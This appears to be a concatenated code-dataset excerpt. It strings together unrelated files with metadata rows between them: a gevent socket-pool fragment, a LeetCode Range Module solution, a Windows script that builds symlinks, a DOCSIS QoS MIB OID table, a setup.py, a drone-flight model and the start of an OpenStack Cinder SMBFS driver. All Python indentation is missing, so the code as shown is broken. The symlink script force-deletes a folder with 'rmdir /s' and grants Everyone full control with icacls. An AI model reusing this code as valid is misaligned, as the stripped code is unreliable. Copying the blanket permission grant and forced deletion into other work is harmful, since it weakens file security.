else:
try: # check that the underlying fileno still exists
sock.fileno()
live.append(sock)
except socket.error:
pass # if no fileno, the socket is dead and no need to close it
# STEP 2 - CULL READABLE SOCKETS
if live: # (if live is [], select.select() would error)
readable = set(select.select(live, [], [], 0)[0])
# if a socket is readable that means one of two bad things:
# 1- the socket has been closed (and sock.recv() would return '')
# 2- the server has sent some data which no client has claimed
# (which will remain in the recv buffer and mess up the next client)
live = [s for s in live if s not in readable]
culled.extend(readable)
self.free_socks_by_addr[addr] = live
self.total_sockets += len(live)
# shutdown all the culled sockets
for sock in culled:
del self.sock_idle_times[sock]
gevent.spawn(self.killsock, sock)
def __repr__(self):
return "<%s nsocks=%r/%r naddrs=%r>" % (self.__class__.__name__,
self.total_sockets,
self.max_sockets,
len(self.free_socks_by_addr))
| bsd-3-clause | 3,623,353,880,487,837,700 | 41.685535 | 102 | 0.573155 | false |
JulyKikuAkita/PythonPrac | cs15211/RangeModule.py | 1 | 7564 | __source__ = 'https://leetcode.com/problems/range-module/'
# Time: O(logK) to O(K)
# Space: O(A+R), the space used by ranges.
#
# Description: Leetcode # 715. Range Module
#
# A Range Module is a module that tracks ranges of numbers.
# Your task is to design and implement the following interfaces in an efficient manner.
#
# addRange(int left, int right) Adds the half-open interval [left, right),
# tracking every real number in that interval.
# Adding an interval that partially overlaps with currently tracked numbers
# should add any numbers in the interval [left, right) that are not already tracked.
#
# queryRange(int left, int right) Returns true if and only if every real number in the interval
# [left, right) is currently being tracked.
#
# removeRange(int left, int right) Stops tracking every real number currently being tracked
# in the interval [left, right).
#
# Example 1:
#
# addRange(10, 20): null
# removeRange(14, 16): null
# queryRange(10, 14): true (Every number in [10, 14) is being tracked)
# queryRange(13, 15): false (Numbers like 14, 14.03, 14.17 in [13, 15) are not being tracked)
# queryRange(16, 17): true (The number 16 in [16, 17) is still being tracked,
# despite the remove operation)
#
# Note:
# A half open interval [left, right) denotes all real numbers left <= x < right.
# 0 < left < right < 10^9 in all calls to addRange, queryRange, removeRange.
# The total number of calls to addRange in a single test case is at most 1000.
# The total number of calls to queryRange in a single test case is at most 5000.
# The total number of calls to removeRange in a single test case is at most 1000.
#
import unittest
import bisect
# 308ms 58.44%
class RangeModule(object):
def __init__(self):
self.ranges = []
def _bounds(self, left, right):
i, j = 0, len(self.ranges) - 1
for d in (100, 10, 1):
while i + d - 1 < len(self.ranges) and self.ranges[i+d-1][1] < left:
i += d
while j >= d - 1 and self.ranges[j-d+1][0] > right:
j -= d
return i, j
def addRange(self, left, right):
i, j = self._bounds(left, right)
if i <= j:
left = min(left, self.ranges[i][0])
right = max(right, self.ranges[j][1])
self.ranges[i:j+1] = [(left, right)]
def queryRange(self, left, right):
i = bisect.bisect_left(self.ranges, (left, float('inf')))
if i: i -= 1
return (bool(self.ranges) and
self.ranges[i][0] <= left and
right <= self.ranges[i][1])
def removeRange(self, left, right):
i, j = self._bounds(left, right)
merge = []
for k in xrange(i, j+1):
if self.ranges[k][0] < left:
merge.append((self.ranges[k][0], left))
if right < self.ranges[k][1]:
merge.append((right, self.ranges[k][1]))
self.ranges[i:j+1] = merge
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/range-module/solution/
#
Approach #1: Maintain Sorted Disjoint Intervals [Accepted]
Complexity Analysis
Time Complexity: Let K be the number of elements in ranges.
addRange and removeRange operations have O(K) complexity
queryRange has O(logK) complexity
Because addRange, removeRange adds at most 1 interval at a time, you can bound these further.
For example, if there are A addRange, R removeRange, and Q queryRange number of operations respectively,
we can express our complexity as O((A+R)^2 Qlog(A+R))
Space Complexity: O(A+R), the space used by ranges.
# 121ms 89.92%
class RangeModule {
TreeSet<Interval> ranges;
public RangeModule() {
ranges = new TreeSet();
}
public void addRange(int left, int right) {
Iterator<Interval> itr = ranges.tailSet(new Interval(0, left - 1)).iterator();
while (itr.hasNext()) {
Interval iv = itr.next();
if (right < iv.left) break;
left = Math.min(left, iv.left);
right = Math.max(right, iv.right);
itr.remove();
}
ranges.add(new Interval(left, right));
}
public boolean queryRange(int left, int right) {
Interval iv = ranges.higher(new Interval(0, left));
return (iv != null && iv.left <= left && right <= iv.right);
}
public void removeRange(int left, int right) {
Iterator<Interval> itr = ranges.tailSet(new Interval(0, left)).iterator();
ArrayList<Interval> todo = new ArrayList();
while (itr.hasNext()) {
Interval iv = itr.next();
if (right < iv.left) break;
if (iv.left < left) todo.add(new Interval(iv.left, left));
if (right < iv.right) todo.add(new Interval(right, iv.right));
itr.remove();
}
for (Interval iv: todo) ranges.add(iv);
}
}
class Interval implements Comparable<Interval>{
int left;
int right;
public Interval(int left, int right){
this.left = left;
this.right = right;
}
public int compareTo(Interval that){
if (this.right == that.right) return this.left - that.left;
return this.right - that.right;
}
}
/**
* Your RangeModule object will be instantiated and called as such:
* RangeModule obj = new RangeModule();
* obj.addRange(left,right);
* boolean param_2 = obj.queryRange(left,right);
* obj.removeRange(left,right);
*/
# 136ms 78.23%
class RangeModule {
List<int[]> ranges = new ArrayList<int[]>();
public RangeModule() {
ranges.add(new int[]{-1, -1});
}
public void addRange(int left, int right) {
int l = searchFloor(left);
int r = searchFloor(right);
int[] vl = ranges.get(l);
int[] vr = ranges.get(r);
if (vr[1] < left) {
ranges.add(r + 1, new int[]{left, right});
} else {
for (int k = 0; k < r - l; k++) ranges.remove(l + 1);
if (vl[1] < left) {
ranges.add(l + 1, new int[]{left, Math.max(right, vr[1])});
} else {
ranges.remove(l);
ranges.add(l, new int[] {vl[0], Math.max(right, vr[1])});
}
}
}
public boolean queryRange(int left, int right) {
int l = searchFloor(left);
int[] r = ranges.get(l);
return (r[1] >= right);
}
public void removeRange(int left, int right) {
int l = searchFloor(left);
int r = searchFloor(right);
int[] vl = ranges.get(l);
int[] vr = ranges.get(r);
if (vr[1] <= left) return;
for (int k = 0; k < r - l; k++) ranges.remove(l + 1);
if (vr[1] > right) {
ranges.add(l + 1, new int[]{right, vr[1]});
}
if (vl[1] > left) {
ranges.remove(l);
if (vl[0] < left) {
ranges.add(l, new int[]{vl[0], left});
}
}
}
// search nearest internal starts at or before key and return the index
private int searchFloor(int key) {
int l = 0, h = ranges.size();
while (l + 1 < h) {
int m = l + (h - l) / 2;
int v = ranges.get(m)[0];
if (v < key) {
l = m;
} else if (v == key) {
l = m;
break;
} else {
h = m;
}
}
return l;
}
}
'''
| apache-2.0 | 7,008,019,913,116,863,000 | 32.321586 | 105 | 0.569672 | false |
jthrun/sdl_android | baseAndroid/make_symbolic_links.py | 1 | 2232 | import os
import pathlib
from pathlib import Path
import re
def has_admin():
if os.name == 'nt':
try:
# only windows users with admin privileges can read the C:\windows\temp
temp = os.listdir(os.sep.join([os.environ.get('SystemRoot', 'C:\\windows'), 'temp']))
except:
return os.environ['USERNAME'],False
else:
return os.environ['USERNAME'],True
else:
if 'SUDO_USER' in os.environ and os.geteuid() == 0:
return os.environ['SUDO_USER'],True
else:
return os.environ['USERNAME'],False
print('Script Start')
isAdmin = has_admin()
print('Running As Admin - ', isAdmin[1])
if not isAdmin[1]:
print('Can\'t run without admin privileges')
exit()
pathlist = Path('src/').glob('**/*')
# Delete the old directory
os.system('echo y | rmdir windows /s')
for path in pathlist:
path_in_str = str(path)
if os.path.isfile(path):
# check if it's a link to a file or folder
source_link_str = path_in_str
source_link_str = '..\\base\\' + source_link_str
# Remove the root folder for the actual link
print(source_link_str)
testDest = 'windows\\' + path_in_str
directory = pathlib.Path(testDest).parent
print(str(directory))
prefixDir = (re.sub(r"\\+[^\\]*", r"\\..", str(directory))+'\\..\\')[8:] # 8 to remove windows/
# Change all the directory paths into .. so that it will properly move up a folder.
os.system('mkdir %s' % directory)
os.system('icacls %s /grant Everyone:(f)' % directory)
# Now we need to go through each destination directory and understand that's how many ../ we have to add
if path_in_str.endswith('.java'):
print('Java file link found')
command = 'mklink "%s" "%s%s"' % (testDest, prefixDir, source_link_str)
print('Performing command %s' % command)
os.system(command)
else:
print('Directory link found')
command = 'mklink /D "%s" "%s%s"' % (testDest, prefixDir, source_link_str)
print('Performing command %s' % command)
os.system(command)
print('Script Ends')
| bsd-3-clause | -4,495,510,196,234,252,000 | 31.347826 | 112 | 0.584229 | false |
xiangke/pycopia | mibs/pycopia/mibs/DOCS_IETF_QOS_MIB_OID.py | 1 | 11335 | # python
# This file is generated by a program (mib2py).
import DOCS_IETF_QOS_MIB
OIDMAP = {
'1.3.6.1.2.1.127': DOCS_IETF_QOS_MIB.docsIetfQosMIB,
'1.3.6.1.2.1.127.0': DOCS_IETF_QOS_MIB.docsIetfQosNotifications,
'1.3.6.1.2.1.127.1': DOCS_IETF_QOS_MIB.docsIetfQosMIBObjects,
'1.3.6.1.2.1.127.2': DOCS_IETF_QOS_MIB.docsIetfQosConformance,
'1.3.6.1.2.1.127.2.1': DOCS_IETF_QOS_MIB.docsIetfQosGroups,
'1.3.6.1.2.1.127.2.2': DOCS_IETF_QOS_MIB.docsIetfQosCompliances,
'1.3.6.1.2.1.127.1.1.1.1': DOCS_IETF_QOS_MIB.docsIetfQosPktClassId,
'1.3.6.1.2.1.127.1.1.1.2': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDirection,
'1.3.6.1.2.1.127.1.1.1.3': DOCS_IETF_QOS_MIB.docsIetfQosPktClassPriority,
'1.3.6.1.2.1.127.1.1.1.4': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpTosLow,
'1.3.6.1.2.1.127.1.1.1.5': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpTosHigh,
'1.3.6.1.2.1.127.1.1.1.6': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpTosMask,
'1.3.6.1.2.1.127.1.1.1.7': DOCS_IETF_QOS_MIB.docsIetfQosPktClassIpProtocol,
'1.3.6.1.2.1.127.1.1.1.8': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetAddressType,
'1.3.6.1.2.1.127.1.1.1.9': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetSourceAddr,
'1.3.6.1.2.1.127.1.1.1.10': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetSourceMask,
'1.3.6.1.2.1.127.1.1.1.11': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetDestAddr,
'1.3.6.1.2.1.127.1.1.1.12': DOCS_IETF_QOS_MIB.docsIetfQosPktClassInetDestMask,
'1.3.6.1.2.1.127.1.1.1.13': DOCS_IETF_QOS_MIB.docsIetfQosPktClassSourcePortStart,
'1.3.6.1.2.1.127.1.1.1.14': DOCS_IETF_QOS_MIB.docsIetfQosPktClassSourcePortEnd,
'1.3.6.1.2.1.127.1.1.1.15': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestPortStart,
'1.3.6.1.2.1.127.1.1.1.16': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestPortEnd,
'1.3.6.1.2.1.127.1.1.1.17': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestMacAddr,
'1.3.6.1.2.1.127.1.1.1.18': DOCS_IETF_QOS_MIB.docsIetfQosPktClassDestMacMask,
'1.3.6.1.2.1.127.1.1.1.19': DOCS_IETF_QOS_MIB.docsIetfQosPktClassSourceMacAddr,
'1.3.6.1.2.1.127.1.1.1.20': DOCS_IETF_QOS_MIB.docsIetfQosPktClassEnetProtocolType,
'1.3.6.1.2.1.127.1.1.1.21': DOCS_IETF_QOS_MIB.docsIetfQosPktClassEnetProtocol,
'1.3.6.1.2.1.127.1.1.1.22': DOCS_IETF_QOS_MIB.docsIetfQosPktClassUserPriLow,
'1.3.6.1.2.1.127.1.1.1.23': DOCS_IETF_QOS_MIB.docsIetfQosPktClassUserPriHigh,
'1.3.6.1.2.1.127.1.1.1.24': DOCS_IETF_QOS_MIB.docsIetfQosPktClassVlanId,
'1.3.6.1.2.1.127.1.1.1.25': DOCS_IETF_QOS_MIB.docsIetfQosPktClassStateActive,
'1.3.6.1.2.1.127.1.1.1.26': DOCS_IETF_QOS_MIB.docsIetfQosPktClassPkts,
'1.3.6.1.2.1.127.1.1.1.27': DOCS_IETF_QOS_MIB.docsIetfQosPktClassBitMap,
'1.3.6.1.2.1.127.1.2.1.1': DOCS_IETF_QOS_MIB.docsIetfQosParamSetServiceClassName,
'1.3.6.1.2.1.127.1.2.1.2': DOCS_IETF_QOS_MIB.docsIetfQosParamSetPriority,
'1.3.6.1.2.1.127.1.2.1.3': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxTrafficRate,
'1.3.6.1.2.1.127.1.2.1.4': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxTrafficBurst,
'1.3.6.1.2.1.127.1.2.1.5': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMinReservedRate,
'1.3.6.1.2.1.127.1.2.1.6': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMinReservedPkt,
'1.3.6.1.2.1.127.1.2.1.7': DOCS_IETF_QOS_MIB.docsIetfQosParamSetActiveTimeout,
'1.3.6.1.2.1.127.1.2.1.8': DOCS_IETF_QOS_MIB.docsIetfQosParamSetAdmittedTimeout,
'1.3.6.1.2.1.127.1.2.1.9': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxConcatBurst,
'1.3.6.1.2.1.127.1.2.1.10': DOCS_IETF_QOS_MIB.docsIetfQosParamSetSchedulingType,
'1.3.6.1.2.1.127.1.2.1.11': DOCS_IETF_QOS_MIB.docsIetfQosParamSetNomPollInterval,
'1.3.6.1.2.1.127.1.2.1.12': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTolPollJitter,
'1.3.6.1.2.1.127.1.2.1.13': DOCS_IETF_QOS_MIB.docsIetfQosParamSetUnsolicitGrantSize,
'1.3.6.1.2.1.127.1.2.1.14': DOCS_IETF_QOS_MIB.docsIetfQosParamSetNomGrantInterval,
'1.3.6.1.2.1.127.1.2.1.15': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTolGrantJitter,
'1.3.6.1.2.1.127.1.2.1.16': DOCS_IETF_QOS_MIB.docsIetfQosParamSetGrantsPerInterval,
'1.3.6.1.2.1.127.1.2.1.17': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTosAndMask,
'1.3.6.1.2.1.127.1.2.1.18': DOCS_IETF_QOS_MIB.docsIetfQosParamSetTosOrMask,
'1.3.6.1.2.1.127.1.2.1.19': DOCS_IETF_QOS_MIB.docsIetfQosParamSetMaxLatency,
'1.3.6.1.2.1.127.1.2.1.20': DOCS_IETF_QOS_MIB.docsIetfQosParamSetType,
'1.3.6.1.2.1.127.1.2.1.21': DOCS_IETF_QOS_MIB.docsIetfQosParamSetRequestPolicyOct,
'1.3.6.1.2.1.127.1.2.1.22': DOCS_IETF_QOS_MIB.docsIetfQosParamSetBitMap,
'1.3.6.1.2.1.127.1.3.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowId,
'1.3.6.1.2.1.127.1.3.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowSID,
'1.3.6.1.2.1.127.1.3.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowDirection,
'1.3.6.1.2.1.127.1.3.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPrimary,
'1.3.6.1.2.1.127.1.4.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPkts,
'1.3.6.1.2.1.127.1.4.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowOctets,
'1.3.6.1.2.1.127.1.4.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowTimeCreated,
'1.3.6.1.2.1.127.1.4.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowTimeActive,
'1.3.6.1.2.1.127.1.4.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPHSUnknowns,
'1.3.6.1.2.1.127.1.4.1.6': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPolicedDropPkts,
'1.3.6.1.2.1.127.1.4.1.7': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowPolicedDelayPkts,
'1.3.6.1.2.1.127.1.5.1.1': DOCS_IETF_QOS_MIB.docsIetfQosSID,
'1.3.6.1.2.1.127.1.5.1.2': DOCS_IETF_QOS_MIB.docsIetfQosUpstreamFragments,
'1.3.6.1.2.1.127.1.5.1.3': DOCS_IETF_QOS_MIB.docsIetfQosUpstreamFragDiscards,
'1.3.6.1.2.1.127.1.5.1.4': DOCS_IETF_QOS_MIB.docsIetfQosUpstreamConcatBursts,
'1.3.6.1.2.1.127.1.6.1.1': DOCS_IETF_QOS_MIB.docsIetfQosIfDirection,
'1.3.6.1.2.1.127.1.6.1.2': DOCS_IETF_QOS_MIB.docsIetfQosDSAReqs,
'1.3.6.1.2.1.127.1.6.1.3': DOCS_IETF_QOS_MIB.docsIetfQosDSARsps,
'1.3.6.1.2.1.127.1.6.1.4': DOCS_IETF_QOS_MIB.docsIetfQosDSAAcks,
'1.3.6.1.2.1.127.1.6.1.5': DOCS_IETF_QOS_MIB.docsIetfQosDSCReqs,
'1.3.6.1.2.1.127.1.6.1.6': DOCS_IETF_QOS_MIB.docsIetfQosDSCRsps,
'1.3.6.1.2.1.127.1.6.1.7': DOCS_IETF_QOS_MIB.docsIetfQosDSCAcks,
'1.3.6.1.2.1.127.1.6.1.8': DOCS_IETF_QOS_MIB.docsIetfQosDSDReqs,
'1.3.6.1.2.1.127.1.6.1.9': DOCS_IETF_QOS_MIB.docsIetfQosDSDRsps,
'1.3.6.1.2.1.127.1.6.1.10': DOCS_IETF_QOS_MIB.docsIetfQosDynamicAdds,
'1.3.6.1.2.1.127.1.6.1.11': DOCS_IETF_QOS_MIB.docsIetfQosDynamicAddFails,
'1.3.6.1.2.1.127.1.6.1.12': DOCS_IETF_QOS_MIB.docsIetfQosDynamicChanges,
'1.3.6.1.2.1.127.1.6.1.13': DOCS_IETF_QOS_MIB.docsIetfQosDynamicChangeFails,
'1.3.6.1.2.1.127.1.6.1.14': DOCS_IETF_QOS_MIB.docsIetfQosDynamicDeletes,
'1.3.6.1.2.1.127.1.6.1.15': DOCS_IETF_QOS_MIB.docsIetfQosDynamicDeleteFails,
'1.3.6.1.2.1.127.1.6.1.16': DOCS_IETF_QOS_MIB.docsIetfQosDCCReqs,
'1.3.6.1.2.1.127.1.6.1.17': DOCS_IETF_QOS_MIB.docsIetfQosDCCRsps,
'1.3.6.1.2.1.127.1.6.1.18': DOCS_IETF_QOS_MIB.docsIetfQosDCCAcks,
'1.3.6.1.2.1.127.1.6.1.19': DOCS_IETF_QOS_MIB.docsIetfQosDCCs,
'1.3.6.1.2.1.127.1.6.1.20': DOCS_IETF_QOS_MIB.docsIetfQosDCCFails,
'1.3.6.1.2.1.127.1.7.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogIndex,
'1.3.6.1.2.1.127.1.7.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogIfIndex,
'1.3.6.1.2.1.127.1.7.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogSFID,
'1.3.6.1.2.1.127.1.7.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogCmMac,
'1.3.6.1.2.1.127.1.7.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPkts,
'1.3.6.1.2.1.127.1.7.1.6': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogOctets,
'1.3.6.1.2.1.127.1.7.1.7': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogTimeDeleted,
'1.3.6.1.2.1.127.1.7.1.8': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogTimeCreated,
'1.3.6.1.2.1.127.1.7.1.9': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogTimeActive,
'1.3.6.1.2.1.127.1.7.1.10': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogDirection,
'1.3.6.1.2.1.127.1.7.1.11': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPrimary,
'1.3.6.1.2.1.127.1.7.1.12': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogServiceClassName,
'1.3.6.1.2.1.127.1.7.1.13': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPolicedDropPkts,
'1.3.6.1.2.1.127.1.7.1.14': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogPolicedDelayPkts,
'1.3.6.1.2.1.127.1.7.1.15': DOCS_IETF_QOS_MIB.docsIetfQosServiceFlowLogControl,
'1.3.6.1.2.1.127.1.8.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassName,
'1.3.6.1.2.1.127.1.8.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassStatus,
'1.3.6.1.2.1.127.1.8.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPriority,
'1.3.6.1.2.1.127.1.8.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxTrafficRate,
'1.3.6.1.2.1.127.1.8.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxTrafficBurst,
'1.3.6.1.2.1.127.1.8.1.6': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMinReservedRate,
'1.3.6.1.2.1.127.1.8.1.7': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMinReservedPkt,
'1.3.6.1.2.1.127.1.8.1.8': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxConcatBurst,
'1.3.6.1.2.1.127.1.8.1.9': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassNomPollInterval,
'1.3.6.1.2.1.127.1.8.1.10': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTolPollJitter,
'1.3.6.1.2.1.127.1.8.1.11': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassUnsolicitGrantSize,
'1.3.6.1.2.1.127.1.8.1.12': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassNomGrantInterval,
'1.3.6.1.2.1.127.1.8.1.13': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTolGrantJitter,
'1.3.6.1.2.1.127.1.8.1.14': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassGrantsPerInterval,
'1.3.6.1.2.1.127.1.8.1.15': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassMaxLatency,
'1.3.6.1.2.1.127.1.8.1.16': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassActiveTimeout,
'1.3.6.1.2.1.127.1.8.1.17': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassAdmittedTimeout,
'1.3.6.1.2.1.127.1.8.1.18': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassSchedulingType,
'1.3.6.1.2.1.127.1.8.1.19': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassRequestPolicy,
'1.3.6.1.2.1.127.1.8.1.20': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTosAndMask,
'1.3.6.1.2.1.127.1.8.1.21': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassTosOrMask,
'1.3.6.1.2.1.127.1.8.1.22': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassDirection,
'1.3.6.1.2.1.127.1.8.1.23': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassStorageType,
'1.3.6.1.2.1.127.1.8.1.24': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassDSCPOverwrite,
'1.3.6.1.2.1.127.1.9.1.1': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyIndex,
'1.3.6.1.2.1.127.1.9.1.2': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyName,
'1.3.6.1.2.1.127.1.9.1.3': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyRulePriority,
'1.3.6.1.2.1.127.1.9.1.4': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyStatus,
'1.3.6.1.2.1.127.1.9.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassPolicyStorageType,
'1.3.6.1.2.1.127.1.10.1.1': DOCS_IETF_QOS_MIB.docsIetfQosPHSField,
'1.3.6.1.2.1.127.1.10.1.2': DOCS_IETF_QOS_MIB.docsIetfQosPHSMask,
'1.3.6.1.2.1.127.1.10.1.3': DOCS_IETF_QOS_MIB.docsIetfQosPHSSize,
'1.3.6.1.2.1.127.1.10.1.4': DOCS_IETF_QOS_MIB.docsIetfQosPHSVerify,
'1.3.6.1.2.1.127.1.10.1.5': DOCS_IETF_QOS_MIB.docsIetfQosPHSIndex,
'1.3.6.1.2.1.127.1.11.1.1': DOCS_IETF_QOS_MIB.docsIetfQosCmtsCmMac,
'1.3.6.1.2.1.127.1.11.1.2': DOCS_IETF_QOS_MIB.docsIetfQosCmtsServiceFlowId,
'1.3.6.1.2.1.127.1.11.1.3': DOCS_IETF_QOS_MIB.docsIetfQosCmtsIfIndex,
'1.3.6.1.2.1.127.2.1.1': DOCS_IETF_QOS_MIB.docsIetfQosBaseGroup,
'1.3.6.1.2.1.127.2.1.2': DOCS_IETF_QOS_MIB.docsIetfQosParamSetGroup,
'1.3.6.1.2.1.127.2.1.3': DOCS_IETF_QOS_MIB.docsIetfQosCmtsGroup,
'1.3.6.1.2.1.127.2.1.4': DOCS_IETF_QOS_MIB.docsIetfQosSrvClassPolicyGroup,
'1.3.6.1.2.1.127.2.1.5': DOCS_IETF_QOS_MIB.docsIetfQosServiceClassGroup,
}
| lgpl-2.1 | -1,082,230,034,744,591,600 | 72.603896 | 88 | 0.739832 | false |
CIGIHub/django-ga-puller | setup.py | 1 | 1369 | from setuptools import setup # Always prefer setuptools over distutils
import os
README = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-ga-puller',
version='0.1.6',
packages=['ga_puller', 'ga_puller.management', 'ga_puller.management.commands'],
include_package_data=True,
license='MIT License',
description='Django app used to pull daily Google Analytics data into your django database.',
long_description=README,
url='https://github.com/CIGIHub/django-ga-puller/',
author='Caroline Simpson',
author_email='[email protected]',
install_requires=[
'google-api-python-client >= 1.2',
'pycrypto >= 2.6.1',
],
setup_requires=[
'google-api-python-client >= 1.2',
'pycrypto >= 2.6.1',
],
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| mit | -3,372,976,600,499,143,700 | 34.102564 | 97 | 0.626004 | false |
ftalex/buffelgrass_mapper | BuffelWeb/Model.py | 1 | 1562 | """
Classes for use with genshi, these are the basic datastructres that are used to create
populate the values of the templaes.
"""
__author__ = "Alex Warren"
__copyright__ = "Copyright 2015, Autonomous Mapping Project"
__credits__ = ["Alex Warren", "Rachel Powers", "Thomas Schuker",
"Travis Kibler", "Jesse Odle", "Jeremy Hibbs"]
__license__ = "BSD 2"
import os
from BuffelMapper.Settings import settings
from droneapi.lib import VehicleMode, Vehicle
class Photograph(object):
def __init__(self, file_path, date_time):
self.file_path = file_path
self.date_time = date_time
def __repr__(self):
return '<%s %r>' % (type(self).__name__, self.date_time)
class Flight(object):
def __init__(self, path, date, flight_title, idx):
self.path = path
self.date = date
self.flight_title = flight_title
self.name = "%s_%s" %(date, flight_title)
self.idx = idx
def __str__(self):
return self.flight_title
class Flights(object):
def __init__(self):
self.flights = []
log_dir = settings["log_dir"]
self.log_dir = log_dir
all_date_dirs = [d for d in os.listdir(log_dir) if os.path.isdir(os.path.join(log_dir, d))]
for date_dir in os.listdir(log_dir):
full_date_dir = os.path.join(log_dir, date_dir)
if not os.path.isdir(full_date_dir):
continue
for flight_dir in os.listdir(full_date_dir):
full_flight_dir = os.path.join(full_date_dir, flight_dir)
if not os.path.isdir(full_flight_dir):
continue
self.flights.append(Flight(full_flight_dir, date_dir, flight_dir, len(self.flights)))
| bsd-2-clause | -7,928,987,849,017,785,000 | 28.471698 | 93 | 0.669014 | false |
hguemar/cinder | cinder/volume/drivers/windows/smbfs.py | 1 | 10774 | # Copyright (c) 2014 Cloudbase Solutions SRL
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import sys
from oslo.utils import units
from oslo_config import cfg
from cinder import exception
from cinder.i18n import _
from cinder.image import image_utils
from cinder.openstack.common import fileutils
from cinder.openstack.common import log as logging
from cinder import utils
from cinder.volume.drivers import smbfs
from cinder.volume.drivers.windows import remotefs
from cinder.volume.drivers.windows import vhdutils
VERSION = '1.0.0'
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.set_default('smbfs_shares_config', r'C:\OpenStack\smbfs_shares.txt')
CONF.set_default('smbfs_mount_point_base', r'C:\OpenStack\_mnt')
CONF.set_default('smbfs_default_volume_format', 'vhd')
class WindowsSmbfsDriver(smbfs.SmbfsDriver):
VERSION = VERSION
def __init__(self, *args, **kwargs):
super(WindowsSmbfsDriver, self).__init__(*args, **kwargs)
self.base = getattr(self.configuration,
'smbfs_mount_point_base',
CONF.smbfs_mount_point_base)
opts = getattr(self.configuration,
'smbfs_mount_options',
CONF.smbfs_mount_options)
